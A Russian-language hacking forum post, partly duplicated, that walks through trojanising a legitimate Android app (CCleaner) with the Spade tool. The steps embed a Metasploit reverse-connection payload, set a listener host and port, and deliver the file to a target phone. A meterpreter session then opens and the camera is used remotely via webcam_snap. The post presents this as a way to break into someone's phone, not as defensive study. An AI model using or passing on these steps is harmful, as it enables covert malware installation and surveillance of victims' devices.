hack-anonim
Пользователь
hack-anonim
Пользователь
- 24 Окт 2015
- 572
- 316
Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.
Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner)
Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее: git clone
После успешного выполнения команды, вводим следующее:
> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)
После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.
> lhost > 192.168.0.103
> lport > 4444
Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.
Видим привилегии, которые нам доступны:
Готовый файл сохраняется в директории /root/spade
На запрос этой настройки отвечаем утвердительно:
Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:
Попробуем осмотреться в системе:
Все работает, теперь можно испытать работу, к примеру, камеры: webcam_snap
И эта команда срабатывает успешно:
Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner)
Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее: git clone
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
После успешного выполнения команды, вводим следующее:
> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)
После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.
> lhost > 192.168.0.103
> lport > 4444
Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.
Видим привилегии, которые нам доступны:
Готовый файл сохраняется в директории /root/spade
На запрос этой настройки отвечаем утвердительно:
Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:
Попробуем осмотреться в системе:
Все работает, теперь можно испытать работу, к примеру, камеры: webcam_snap
И эта команда срабатывает успешно:
